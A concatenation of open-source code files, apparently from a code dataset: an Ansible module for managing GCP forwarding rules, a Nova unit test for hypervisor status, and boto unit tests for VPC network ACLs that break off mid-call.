__metaclass__ = type
################################################################################
# Documentation
################################################################################
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ["preview"],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: gcp_compute_forwarding_rule
description:
- A ForwardingRule resource. A ForwardingRule resource specifies which pool of target
virtual machines to forward a packet to if it matches the given [IPAddress, IPProtocol,
portRange] tuple.
short_description: Creates a GCP ForwardingRule
version_added: 2.6
author: Google Inc. (@googlecloudplatform)
requirements:
- python >= 2.6
- requests >= 2.18.4
- google-auth >= 1.3.0
options:
state:
description:
- Whether the given object should exist in GCP
choices:
- present
- absent
default: present
description:
description:
- An optional description of this resource. Provide this property when you create
the resource.
required: false
ip_address:
description:
- The IP address that this forwarding rule is serving on behalf of.
- Addresses are restricted based on the forwarding rule's load balancing scheme
(EXTERNAL or INTERNAL) and scope (global or regional).
- When the load balancing scheme is EXTERNAL, for global forwarding rules, the
address must be a global IP, and for regional forwarding rules, the address
must live in the same region as the forwarding rule. If this field is empty,
an ephemeral IPv4 address from the same scope (global or regional) will be assigned.
A regional forwarding rule supports IPv4 only. A global forwarding rule supports
either IPv4 or IPv6.
- When the load balancing scheme is INTERNAL, this can only be an RFC 1918 IP
address belonging to the network/subnet configured for the forwarding rule.
By default, if this field is empty, an ephemeral internal IP address will be
automatically allocated from the IP range of the subnet or network configured
for this forwarding rule.
- 'An address can be specified either by a literal IP address or a URL reference
to an existing Address resource. The following examples are all valid: * 100.1.2.3
* U(https://www.googleapis.com/compute/v1/projects/project/regions/region/addresses/address)
* projects/project/regions/region/addresses/address * regions/region/addresses/address
* global/addresses/address * address .'
required: false
ip_protocol:
description:
- The IP protocol to which this rule applies. Valid options are TCP, UDP, ESP,
AH, SCTP or ICMP.
- When the load balancing scheme is INTERNAL, only TCP and UDP are valid.
required: false
choices:
- TCP
- UDP
- ESP
- AH
- SCTP
- ICMP
backend_service:
description:
- A reference to a BackendService to receive the matched traffic.
- This is used for internal load balancing.
- "(not used for external load balancing) ."
- 'This field represents a link to a BackendService resource in GCP. It can be
specified in two ways. You can add `register: name-of-resource` to a gcp_compute_backend_service
task and then set this backend_service field to "{{ name-of-resource }}" Alternatively,
you can set this backend_service to a dictionary with the selfLink key where
the value is the selfLink of your BackendService'
required: false
ip_version:
description:
- The IP Version that will be used by this forwarding rule. Valid options are
IPV4 or IPV6. This can only be specified for a global forwarding rule.
required: false
choices:
- IPV4
- IPV6
load_balancing_scheme:
description:
- 'This signifies what the ForwardingRule will be used for and can only take the
following values: INTERNAL, EXTERNAL The value of INTERNAL means that this will
be used for Internal Network Load Balancing (TCP, UDP). The value of EXTERNAL
means that this will be used for External Load Balancing (HTTP(S) LB, External
TCP/UDP LB, SSL Proxy) .'
required: false
choices:
- INTERNAL
- EXTERNAL
name:
description:
- Name of the resource; provided by the client when the resource is created. The
name must be 1-63 characters long, and comply with RFC1035. Specifically, the
name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`
which means the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last character,
which cannot be a dash.
required: true
network:
description:
- For internal load balancing, this field identifies the network that the load
balanced IP should belong to for this Forwarding Rule. If this field is not
specified, the default network will be used.
- This field is not used for external load balancing.
- 'This field represents a link to a Network resource in GCP. It can be specified
in two ways. You can add `register: name-of-resource` to a gcp_compute_network
task and then set this network field to "{{ name-of-resource }}" Alternatively,
you can set this network to a dictionary with the selfLink key where the value
is the selfLink of your Network'
required: false
port_range:
description:
- This field is used along with the target field for TargetHttpProxy, TargetHttpsProxy,
TargetSslProxy, TargetTcpProxy, TargetVpnGateway, TargetPool, TargetInstance.
- Applicable only when IPProtocol is TCP, UDP, or SCTP, only packets addressed
to ports in the specified range will be forwarded to target.
- Forwarding rules with the same [IPAddress, IPProtocol] pair must have disjoint
port ranges.
- 'Some types of forwarding target have constraints on the acceptable ports: *
TargetHttpProxy: 80, 8080 * TargetHttpsProxy: 443 * TargetTcpProxy: 25, 43,
110, 143, 195, 443, 465, 587, 700, 993, 995, 1883, 5222 * TargetSslProxy: 25,
43, 110, 143, 195, 443, 465, 587, 700, 993, 995, 1883, 5222 * TargetVpnGateway:
500, 4500 .'
required: false
ports:
description:
- This field is used along with the backend_service field for internal load balancing.
- When the load balancing scheme is INTERNAL, a single port or a comma separated
list of ports can be configured. Only packets addressed to these ports will
be forwarded to the backends configured with this forwarding rule.
- You may specify a maximum of up to 5 ports.
required: false
subnetwork:
description:
- A reference to a subnetwork.
- For internal load balancing, this field identifies the subnetwork that the load
balanced IP should belong to for this Forwarding Rule.
- If the network specified is in auto subnet mode, this field is optional. However,
if the network is in custom subnet mode, a subnetwork must be specified.
- This field is not used for external load balancing.
- 'This field represents a link to a Subnetwork resource in GCP. It can be specified
in two ways. You can add `register: name-of-resource` to a gcp_compute_subnetwork
task and then set this subnetwork field to "{{ name-of-resource }}" Alternatively,
you can set this subnetwork to a dictionary with the selfLink key where the
value is the selfLink of your Subnetwork'
required: false
target:
description:
- A reference to a TargetPool resource to receive the matched traffic.
- For regional forwarding rules, this target must live in the same region as the
forwarding rule. For global forwarding rules, this target must be a global load
balancing resource. The forwarded traffic must be of a type appropriate to the
target object.
- This field is not used for internal load balancing.
- 'This field represents a link to a TargetPool resource in GCP. It can be specified
in two ways. You can add `register: name-of-resource` to a gcp_compute_target_pool
task and then set this target field to "{{ name-of-resource }}" Alternatively,
you can set this target to a dictionary with the selfLink key where the value
is the selfLink of your TargetPool'
required: false
version_added: 2.7
network_tier:
description:
- 'The networking tier used for configuring this address. This field can take
the following values: PREMIUM or STANDARD. If this field is not specified, it
is assumed to be PREMIUM.'
required: false
version_added: 2.8
choices:
- PREMIUM
- STANDARD
region:
description:
- A reference to the region where the regional forwarding rule resides.
- This field is not applicable to global forwarding rules.
required: true
extends_documentation_fragment: gcp
notes:
- 'API Reference: U(https://cloud.google.com/compute/docs/reference/latest/forwardingRule)'
- 'Official Documentation: U(https://cloud.google.com/compute/docs/load-balancing/network/forwarding-rules)'
'''
EXAMPLES = '''
- name: create a address
gcp_compute_address:
name: "address-forwardingrule"
region: us-west1
project: "{{ gcp_project }}"
auth_kind: "{{ gcp_cred_kind }}"
service_account_file: "{{ gcp_cred_file }}"
state: present
register: address
- name: create a target pool
gcp_compute_target_pool:
name: "targetpool-forwardingrule"
region: us-west1
project: "{{ gcp_project }}"
auth_kind: "{{ gcp_cred_kind }}"
service_account_file: "{{ gcp_cred_file }}"
state: present
register: targetpool
- name: create a forwarding rule
gcp_compute_forwarding_rule:
name: "test_object"
region: us-west1
target: "{{ targetpool }}"
ip_protocol: TCP
port_range: 80-80
ip_address: "{{ address.address }}"
project: "test_project"
auth_kind: "serviceaccount"
service_account_file: "/tmp/auth.pem"
state: present
'''
RETURN = '''
creationTimestamp:
description:
- Creation timestamp in RFC3339 text format.
returned: success
type: str
description:
description:
- An optional description of this resource. Provide this property when you create
the resource.
returned: success
type: str
id:
description:
- The unique identifier for the resource.
returned: success
type: int
IPAddress:
description:
- The IP address that this forwarding rule is serving on behalf of.
- Addresses are restricted based on the forwarding rule's load balancing scheme
(EXTERNAL or INTERNAL) and scope (global or regional).
- When the load balancing scheme is EXTERNAL, for global forwarding rules, the address
must be a global IP, and for regional forwarding rules, the address must live
in the same region as the forwarding rule. If this field is empty, an ephemeral
IPv4 address from the same scope (global or regional) will be assigned. A regional
forwarding rule supports IPv4 only. A global forwarding rule supports either IPv4
or IPv6.
- When the load balancing scheme is INTERNAL, this can only be an RFC 1918 IP address
belonging to the network/subnet configured for the forwarding rule. By default,
if this field is empty, an ephemeral internal IP address will be automatically
allocated from the IP range of the subnet or network configured for this forwarding
rule.
- 'An address can be specified either by a literal IP address or a URL reference
to an existing Address resource. The following examples are all valid: * 100.1.2.3
* U(https://www.googleapis.com/compute/v1/projects/project/regions/region/addresses/address)
* projects/project/regions/region/addresses/address * regions/region/addresses/address
* global/addresses/address * address .'
returned: success
type: str
IPProtocol:
description:
- The IP protocol to which this rule applies. Valid options are TCP, UDP, ESP, AH,
SCTP or ICMP.
- When the load balancing scheme is INTERNAL, only TCP and UDP are valid.
returned: success
type: str
backendService:
description:
- A reference to a BackendService to receive the matched traffic.
- This is used for internal load balancing.
- "(not used for external load balancing) ."
returned: success
type: dict
ipVersion:
description:
- The IP Version that will be used by this forwarding rule. Valid options are IPV4
or IPV6. This can only be specified for a global forwarding rule.
returned: success
type: str
loadBalancingScheme:
description:
- 'This signifies what the ForwardingRule will be used for and can only take the
following values: INTERNAL, EXTERNAL The value of INTERNAL means that this will
be used for Internal Network Load Balancing (TCP, UDP). The value of EXTERNAL
means that this will be used for External Load Balancing (HTTP(S) LB, External
TCP/UDP LB, SSL Proxy) .'
returned: success
type: str
name:
description:
- Name of the resource; provided by the client when the resource is created. The
name must be 1-63 characters long, and comply with RFC1035. Specifically, the
name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`
which means the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last character,
which cannot be a dash.
returned: success
type: str
network:
description:
- For internal load balancing, this field identifies the network that the load balanced
IP should belong to for this Forwarding Rule. If this field is not specified,
the default network will be used.
- This field is not used for external load balancing.
returned: success
type: dict
portRange:
description:
- This field is used along with the target field for TargetHttpProxy, TargetHttpsProxy,
TargetSslProxy, TargetTcpProxy, TargetVpnGateway, TargetPool, TargetInstance.
- Applicable only when IPProtocol is TCP, UDP, or SCTP, only packets addressed to
ports in the specified range will be forwarded to target.
- Forwarding rules with the same [IPAddress, IPProtocol] pair must have disjoint
port ranges.
- 'Some types of forwarding target have constraints on the acceptable ports: * TargetHttpProxy:
80, 8080 * TargetHttpsProxy: 443 * TargetTcpProxy: 25, 43, 110, 143, 195, 443,
465, 587, 700, 993, 995, 1883, 5222 * TargetSslProxy: 25, 43, 110, 143, 195, 443,
465, 587, 700, 993, 995, 1883, 5222 * TargetVpnGateway: 500, 4500 .'
returned: success
type: str
ports:
description:
- This field is used along with the backend_service field for internal load balancing.
- When the load balancing scheme is INTERNAL, a single port or a comma separated
list of ports can be configured. Only packets addressed to these ports will be
forwarded to the backends configured with this forwarding rule.
- You may specify a maximum of up to 5 ports.
returned: success
type: list
subnetwork:
description:
- A reference to a subnetwork.
- For internal load balancing, this field identifies the subnetwork that the load
balanced IP should belong to for this Forwarding Rule.
- If the network specified is in auto subnet mode, this field is optional. However,
if the network is in custom subnet mode, a subnetwork must be specified.
- This field is not used for external load balancing.
returned: success
type: dict
target:
description:
- A reference to a TargetPool resource to receive the matched traffic.
- For regional forwarding rules, this target must live in the same region as the
forwarding rule. For global forwarding rules, this target must be a global load
balancing resource. The forwarded traffic must be of a type appropriate to the
target object.
- This field is not used for internal load balancing.
returned: success
type: dict
networkTier:
description:
- 'The networking tier used for configuring this address. This field can take the
following values: PREMIUM or STANDARD. If this field is not specified, it is assumed
to be PREMIUM.'
returned: success
type: str
region:
description:
- A reference to the region where the regional forwarding rule resides.
- This field is not applicable to global forwarding rules.
returned: success
type: str
'''
################################################################################
# Imports
################################################################################
from ansible.module_utils.gcp_utils import navigate_hash, GcpSession, GcpModule, GcpRequest, replace_resource_dict
import json
import time
################################################################################
# Main
################################################################################
def main():
"""Main function"""
module = GcpModule(
argument_spec=dict(
state=dict(default='present', choices=['present', 'absent'], type='str'),
description=dict(type='str'),
ip_address=dict(type='str'),
ip_protocol=dict(type='str', choices=['TCP', 'UDP', 'ESP', 'AH', 'SCTP', 'ICMP']),
backend_service=dict(type='dict'),
ip_version=dict(type='str', choices=['IPV4', 'IPV6']),
load_balancing_scheme=dict(type='str', choices=['INTERNAL', 'EXTERNAL']),
name=dict(required=True, type='str'),
network=dict(type='dict'),
port_range=dict(type='str'),
ports=dict(type='list', elements='str'),
subnetwork=dict(type='dict'),
target=dict(type='dict'),
network_tier=dict(type='str', choices=['PREMIUM', 'STANDARD']),
region=dict(required=True, type='str')
)
)
if not module.params['scopes']:
module.params['scopes'] = ['https://www.googleapis.com/auth/compute']
state = module.params['state']
kind = 'compute#forwardingRule'
fetch = fetch_resource(module, self_link(module), kind)
changed = False
if fetch:
if state == 'present':
if is_different(module, fetch):
update(module, self_link(module), kind, fetch)
fetch = fetch_resource(module, self_link(module), kind)
changed = True
else:
delete(module, self_link(module), kind)
fetch = {}
changed = True
else:
if state == 'present':
fetch = create(module, collection(module), kind)
changed = True
else:
fetch = {}
fetch.update({'changed': changed})
module.exit_json(**fetch)
def create(module, link, kind):
auth = GcpSession(module, 'compute')
return wait_for_operation(module, auth.post(link, resource_to_request(module)))
def update(module, link, kind, fetch):
update_fields(module, resource_to_request(module),
response_to_hash(module, fetch))
return fetch_resource(module, self_link(module), kind)
def update_fields(module, request, response):
if response.get('target') != request.get('target'):
target_update(module, request, response)
def target_update(module, request, response):
auth = GcpSession(module, 'compute')
auth.post(
''.join([
"https://www.googleapis.com/compute/v1/",
"projects/{project}/regions/{region}/forwardingRules/{name}/setTarget"
]).format(**module.params),
{
u'target': replace_resource_dict(module.params.get(u'target', {}), 'selfLink')
}
)
def delete(module, link, kind):
auth = GcpSession(module, 'compute')
return wait_for_operation(module, auth.delete(link))
def resource_to_request(module):
request = {
u'kind': 'compute#forwardingRule',
u'description': module.params.get('description'),
u'IPAddress': module.params.get('ip_address'),
u'IPProtocol': module.params.get('ip_protocol'),
u'backendService': replace_resource_dict(module.params.get(u'backend_service', {}), 'selfLink'),
u'ipVersion': module.params.get('ip_version'),
u'loadBalancingScheme': module.params.get('load_balancing_scheme'),
u'name': module.params.get('name'),
u'network': replace_resource_dict(module.params.get(u'network', {}), 'selfLink'),
u'portRange': module.params.get('port_range'),
u'ports': module.params.get('ports'),
u'subnetwork': replace_resource_dict(module.params.get(u'subnetwork', {}), 'selfLink'),
u'target': replace_resource_dict(module.params.get(u'target', {}), 'selfLink'),
u'networkTier': module.params.get('network_tier')
}
return_vals = {}
for k, v in request.items():
if v:
return_vals[k] = v
return return_vals
def fetch_resource(module, link, kind, allow_not_found=True):
auth = GcpSession(module, 'compute')
return return_if_object(module, auth.get(link), kind, allow_not_found)
def self_link(module):
return "https://www.googleapis.com/compute/v1/projects/{project}/regions/{region}/forwardingRules/{name}".format(**module.params)
def collection(module):
return "https://www.googleapis.com/compute/v1/projects/{project}/regions/{region}/forwardingRules".format(**module.params)
def return_if_object(module, response, kind, allow_not_found=False):
# If not found, return nothing.
if allow_not_found and response.status_code == 404:
return None
# If no content, return nothing.
if response.status_code == 204:
return None
try:
module.raise_for_status(response)
result = response.json()
except getattr(json.decoder, 'JSONDecodeError', ValueError) as inst:
module.fail_json(msg="Invalid JSON response with error: %s" % inst)
if navigate_hash(result, ['error', 'errors']):
module.fail_json(msg=navigate_hash(result, ['error', 'errors']))
return result
def is_different(module, response):
request = resource_to_request(module)
response = response_to_hash(module, response)
# Remove all output-only from response.
response_vals = {}
for k, v in response.items():
if k in request:
response_vals[k] = v
request_vals = {}
for k, v in request.items():
if k in response:
request_vals[k] = v
return GcpRequest(request_vals) != GcpRequest(response_vals)
# Remove unnecessary properties from the response.
# This is for doing comparisons with Ansible's current parameters.
def response_to_hash(module, response):
return {
u'creationTimestamp': response.get(u'creationTimestamp'),
u'description': response.get(u'description'),
u'id': response.get(u'id'),
u'IPAddress': response.get(u'IPAddress'),
u'IPProtocol': response.get(u'IPProtocol'),
u'backendService': response.get(u'backendService'),
u'ipVersion': response.get(u'ipVersion'),
u'loadBalancingScheme': response.get(u'loadBalancingScheme'),
u'name': response.get(u'name'),
u'network': response.get(u'network'),
u'portRange': response.get(u'portRange'),
u'ports': response.get(u'ports'),
u'subnetwork': response.get(u'subnetwork'),
u'target': response.get(u'target'),
u'networkTier': module.params.get('network_tier')
}
def async_op_url(module, extra_data=None):
if extra_data is None:
extra_data = {}
url = "https://www.googleapis.com/compute/v1/projects/{project}/regions/{region}/operations/{op_id}"
combined = extra_data.copy()
combined.update(module.params)
return url.format(**combined)
def wait_for_operation(module, response):
op_result = return_if_object(module, response, 'compute#operation')
if op_result is None:
return {}
status = navigate_hash(op_result, ['status'])
wait_done = wait_for_completion(status, op_result, module)
return fetch_resource(module, navigate_hash(wait_done, ['targetLink']), 'compute#forwardingRule')
def wait_for_completion(status, op_result, module):
op_id = navigate_hash(op_result, ['name'])
op_uri = async_op_url(module, {'op_id': op_id})
while status != 'DONE':
raise_if_errors(op_result, ['error', 'errors'], 'message')
time.sleep(1.0)
op_result = fetch_resource(module, op_uri, 'compute#operation')
status = navigate_hash(op_result, ['status'])
return op_result
def raise_if_errors(response, err_path, module):
errors = navigate_hash(response, err_path)
if errors is not None:
module.fail_json(msg=errors)
if __name__ == '__main__':
main()
| gpl-3.0 |
double12gzh/nova | nova/tests/unit/api/openstack/compute/contrib/test_hypervisor_status.py | 36 | 3820 | # Copyright 2014 Intel Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import mock
from nova.api.openstack.compute.contrib import hypervisors as hypervisors_v2
from nova.api.openstack.compute.plugins.v3 import hypervisors \
as hypervisors_v21
from nova.api.openstack import extensions
from nova import objects
from nova import test
from nova.tests.unit.api.openstack.compute.contrib import test_hypervisors
TEST_HYPER = test_hypervisors.TEST_HYPERS_OBJ[0].obj_clone()
TEST_SERVICE = objects.Service(id=1,
host="compute1",
binary="nova-compute",
topic="compute_topic",
report_count=5,
disabled=False,
disabled_reason=None,
availability_zone="nova")
class HypervisorStatusTestV21(test.NoDBTestCase):
def _prepare_extension(self):
self.controller = hypervisors_v21.HypervisorsController()
self.controller.servicegroup_api.service_is_up = mock.MagicMock(
return_value=True)
def test_view_hypervisor_service_status(self):
self._prepare_extension()
result = self.controller._view_hypervisor(
TEST_HYPER, TEST_SERVICE, False)
self.assertEqual('enabled', result['status'])
self.assertEqual('up', result['state'])
self.assertEqual('enabled', result['status'])
self.controller.servicegroup_api.service_is_up.return_value = False
result = self.controller._view_hypervisor(
TEST_HYPER, TEST_SERVICE, False)
self.assertEqual('down', result['state'])
hyper = copy.deepcopy(TEST_HYPER)
service = copy.deepcopy(TEST_SERVICE)
service.disabled = True
result = self.controller._view_hypervisor(hyper, service, False)
self.assertEqual('disabled', result['status'])
def test_view_hypervisor_detail_status(self):
self._prepare_extension()
result = self.controller._view_hypervisor(
TEST_HYPER, TEST_SERVICE, True)
self.assertEqual('enabled', result['status'])
self.assertEqual('up', result['state'])
self.assertIsNone(result['service']['disabled_reason'])
self.controller.servicegroup_api.service_is_up.return_value = False
result = self.controller._view_hypervisor(
TEST_HYPER, TEST_SERVICE, True)
self.assertEqual('down', result['state'])
hyper = copy.deepcopy(TEST_HYPER)
service = copy.deepcopy(TEST_SERVICE)
service.disabled = True
service.disabled_reason = "fake"
result = self.controller._view_hypervisor(hyper, service, True)
self.assertEqual('disabled', result['status'],)
self.assertEqual('fake', result['service']['disabled_reason'])
class HypervisorStatusTestV2(HypervisorStatusTestV21):
def _prepare_extension(self):
ext_mgr = extensions.ExtensionManager()
ext_mgr.extensions = {}
ext_mgr.extensions['os-hypervisor-status'] = True
self.controller = hypervisors_v2.HypervisorsController(ext_mgr)
self.controller.servicegroup_api.service_is_up = mock.MagicMock(
return_value=True)
| apache-2.0 |
awatts/boto | tests/unit/vpc/test_networkacl.py | 113 | 20957 | from tests.unit import unittest
from tests.unit import AWSMockServiceTestCase
from boto.vpc import VPCConnection
class TestDescribeNetworkAcls(AWSMockServiceTestCase):
connection_class = VPCConnection
def default_body(self):
return b"""
<DescribeNetworkAclsResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-01/">
<requestId>59dbff89-35bd-4eac-99ed-be587EXAMPLE</requestId>
<networkAclSet>
<item>
<networkAclId>acl-5566953c</networkAclId>
<vpcId>vpc-5266953b</vpcId>
<default>true</default>
<entrySet>
<item>
<ruleNumber>100</ruleNumber>
<protocol>all</protocol>
<ruleAction>allow</ruleAction>
<egress>true</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
</item>
<item>
<ruleNumber>32767</ruleNumber>
<protocol>all</protocol>
<ruleAction>deny</ruleAction>
<egress>true</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
</item>
<item>
<ruleNumber>100</ruleNumber>
<protocol>all</protocol>
<ruleAction>allow</ruleAction>
<egress>false</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
</item>
<item>
<ruleNumber>32767</ruleNumber>
<protocol>all</protocol>
<ruleAction>deny</ruleAction>
<egress>false</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
</item>
</entrySet>
<associationSet/>
<tagSet/>
</item>
<item>
<networkAclId>acl-5d659634</networkAclId>
<vpcId>vpc-5266953b</vpcId>
<default>false</default>
<entrySet>
<item>
<ruleNumber>110</ruleNumber>
<protocol>6</protocol>
<ruleAction>allow</ruleAction>
<egress>true</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
<portRange>
<from>49152</from>
<to>65535</to>
</portRange>
</item>
<item>
<ruleNumber>32767</ruleNumber>
<protocol>all</protocol>
<ruleAction>deny</ruleAction>
<egress>true</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
</item>
<item>
<ruleNumber>110</ruleNumber>
<protocol>6</protocol>
<ruleAction>allow</ruleAction>
<egress>false</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
<portRange>
<from>80</from>
<to>80</to>
</portRange>
</item>
<item>
<ruleNumber>120</ruleNumber>
<protocol>6</protocol>
<ruleAction>allow</ruleAction>
<egress>false</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
<portRange>
<from>443</from>
<to>443</to>
</portRange>
</item>
<item>
<ruleNumber>32767</ruleNumber>
<protocol>all</protocol>
<ruleAction>deny</ruleAction>
<egress>false</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
</item>
</entrySet>
<associationSet>
<item>
<networkAclAssociationId>aclassoc-5c659635</networkAclAssociationId>
<networkAclId>acl-5d659634</networkAclId>
<subnetId>subnet-ff669596</subnetId>
</item>
<item>
<networkAclAssociationId>aclassoc-c26596ab</networkAclAssociationId>
<networkAclId>acl-5d659634</networkAclId>
<subnetId>subnet-f0669599</subnetId>
</item>
</associationSet>
<tagSet/>
</item>
</networkAclSet>
</DescribeNetworkAclsResponse>
"""
def test_get_all_network_acls(self):
self.set_http_response(status_code=200)
response = self.service_connection.get_all_network_acls(['acl-5566953c', 'acl-5d659634'],
[('vpc-id', 'vpc-5266953b')])
self.assert_request_parameters({
'Action': 'DescribeNetworkAcls',
'NetworkAclId.1': 'acl-5566953c',
'NetworkAclId.2': 'acl-5d659634',
'Filter.1.Name': 'vpc-id',
'Filter.1.Value.1': 'vpc-5266953b'},
ignore_params_values=['AWSAccessKeyId', 'SignatureMethod',
'SignatureVersion', 'Timestamp',
'Version'])
self.assertEqual(len(response), 2)
class TestReplaceNetworkAclAssociation(AWSMockServiceTestCase):
connection_class = VPCConnection
get_all_network_acls_vpc_body = b"""
<DescribeNetworkAclsResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-01/">
<requestId>59dbff89-35bd-4eac-99ed-be587EXAMPLE</requestId>
<networkAclSet>
<item>
<networkAclId>acl-5566953c</networkAclId>
<vpcId>vpc-5266953b</vpcId>
<default>true</default>
<entrySet>
<item>
<ruleNumber>100</ruleNumber>
<protocol>all</protocol>
<ruleAction>allow</ruleAction>
<egress>true</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
</item>
<item>
<ruleNumber>32767</ruleNumber>
<protocol>all</protocol>
<ruleAction>deny</ruleAction>
<egress>true</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
</item>
<item>
<ruleNumber>100</ruleNumber>
<protocol>all</protocol>
<ruleAction>allow</ruleAction>
<egress>false</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
</item>
<item>
<ruleNumber>32767</ruleNumber>
<protocol>all</protocol>
<ruleAction>deny</ruleAction>
<egress>false</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
</item>
</entrySet>
<associationSet/>
<tagSet/>
</item>
</networkAclSet>
</DescribeNetworkAclsResponse>
"""
get_all_network_acls_subnet_body = b"""
<DescribeNetworkAclsResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-01/">
<requestId>59dbff89-35bd-4eac-99ed-be587EXAMPLE</requestId>
<networkAclSet>
<item>
<networkAclId>acl-5d659634</networkAclId>
<vpcId>vpc-5266953b</vpcId>
<default>false</default>
<entrySet>
<item>
<ruleNumber>110</ruleNumber>
<protocol>6</protocol>
<ruleAction>allow</ruleAction>
<egress>true</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
<portRange>
<from>49152</from>
<to>65535</to>
</portRange>
</item>
</entrySet>
<associationSet>
<item>
<networkAclAssociationId>aclassoc-c26596ab</networkAclAssociationId>
<networkAclId>acl-5d659634</networkAclId>
<subnetId>subnet-f0669599</subnetId>
</item>
<item>
<networkAclAssociationId>aclassoc-5c659635</networkAclAssociationId>
<networkAclId>acl-5d659634</networkAclId>
<subnetId>subnet-ff669596</subnetId>
</item>
</associationSet>
<tagSet/>
</item>
</networkAclSet>
</DescribeNetworkAclsResponse>
"""
def default_body(self):
return b"""
<ReplaceNetworkAclAssociationResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-01/">
<requestId>59dbff89-35bd-4eac-99ed-be587EXAMPLE</requestId>
<newAssociationId>aclassoc-17b85d7e</newAssociationId>
</ReplaceNetworkAclAssociationResponse>
"""
def test_associate_network_acl(self):
self.https_connection.getresponse.side_effect = [
self.create_response(status_code=200, body=self.get_all_network_acls_subnet_body),
self.create_response(status_code=200)
]
response = self.service_connection.associate_network_acl('acl-5fb85d36', 'subnet-ff669596')
# Note: Not testing proper call to get_all_network_acls!
self.assert_request_parameters({
'Action': 'ReplaceNetworkAclAssociation',
'NetworkAclId': 'acl-5fb85d36',
'AssociationId': 'aclassoc-5c659635'},
ignore_params_values=['AWSAccessKeyId', 'SignatureMethod',
'SignatureVersion', 'Timestamp',
'Version'])
self.assertEqual(response, 'aclassoc-17b85d7e')
def test_disassociate_network_acl(self):
self.https_connection.getresponse.side_effect = [
self.create_response(status_code=200, body=self.get_all_network_acls_vpc_body),
self.create_response(status_code=200, body=self.get_all_network_acls_subnet_body),
self.create_response(status_code=200)
]
response = self.service_connection.disassociate_network_acl('subnet-ff669596',
'vpc-5266953b')
# Note: Not testing proper call to either call to get_all_network_acls!
self.assert_request_parameters({
'Action': 'ReplaceNetworkAclAssociation',
'NetworkAclId': 'acl-5566953c',
'AssociationId': 'aclassoc-5c659635'},
ignore_params_values=['AWSAccessKeyId', 'SignatureMethod',
'SignatureVersion', 'Timestamp',
'Version'])
self.assertEqual(response, 'aclassoc-17b85d7e')
class TestCreateNetworkAcl(AWSMockServiceTestCase):
connection_class = VPCConnection
def default_body(self):
return b"""
<CreateNetworkAclResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-01/">
<requestId>59dbff89-35bd-4eac-99ed-be587EXAMPLE</requestId>
<networkAcl>
<networkAclId>acl-5fb85d36</networkAclId>
<vpcId>vpc-11ad4878</vpcId>
<default>false</default>
<entrySet>
<item>
<ruleNumber>32767</ruleNumber>
<protocol>all</protocol>
<ruleAction>deny</ruleAction>
<egress>true</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
</item>
<item>
<ruleNumber>32767</ruleNumber>
<protocol>all</protocol>
<ruleAction>deny</ruleAction>
<egress>false</egress>
<cidrBlock>0.0.0.0/0</cidrBlock>
</item>
</entrySet>
<associationSet/>
<tagSet/>
</networkAcl>
</CreateNetworkAclResponse>
"""
def test_create_network_acl(self):
self.set_http_response(status_code=200)
response = self.service_connection.create_network_acl('vpc-11ad4878')
self.assert_request_parameters({
'Action': 'CreateNetworkAcl',
'VpcId': 'vpc-11ad4878'},
ignore_params_values=['AWSAccessKeyId', 'SignatureMethod',
'SignatureVersion', 'Timestamp',
'Version'])
self.assertEqual(response.id, 'acl-5fb85d36')
class DeleteCreateNetworkAcl(AWSMockServiceTestCase):
connection_class = VPCConnection
def default_body(self):
return b"""
<DeleteNetworkAclResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-01/">
<requestId>59dbff89-35bd-4eac-99ed-be587EXAMPLE</requestId>
<return>true</return>
</DeleteNetworkAclResponse>
"""
def test_delete_network_acl(self):
self.set_http_response(status_code=200)
response = self.service_connection.delete_network_acl('acl-2cb85d45')
self.assert_request_parameters({
'Action': 'DeleteNetworkAcl',
'NetworkAclId': 'acl-2cb85d45'},
ignore_params_values=['AWSAccessKeyId', 'SignatureMethod',
'SignatureVersion', 'Timestamp',
'Version'])
self.assertEqual(response, True)
class TestCreateNetworkAclEntry(AWSMockServiceTestCase):
connection_class = VPCConnection
def default_body(self):
return b"""
<CreateNetworkAclEntryResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-01/">
<requestId>59dbff89-35bd-4eac-99ed-be587EXAMPLE</requestId>
<return>true</return>
</CreateNetworkAclEntryResponse>
"""
def test_create_network_acl(self):
self.set_http_response(status_code=200)
response = self.service_connection.create_network_acl_entry(
'acl-2cb85d45', 110, 'udp', 'allow', '0.0.0.0/0', egress=False,
port_range_from=53, port_range_to=53)
self.assert_request_parameters({
'Action': 'CreateNetworkAclEntry',
'NetworkAclId': 'acl-2cb85d45',
'RuleNumber': 110,
'Protocol': 'udp',
'RuleAction': 'allow',
'Egress': 'false',
'CidrBlock': '0.0.0.0/0',
'PortRange.From': 53,
'PortRange.To': 53},
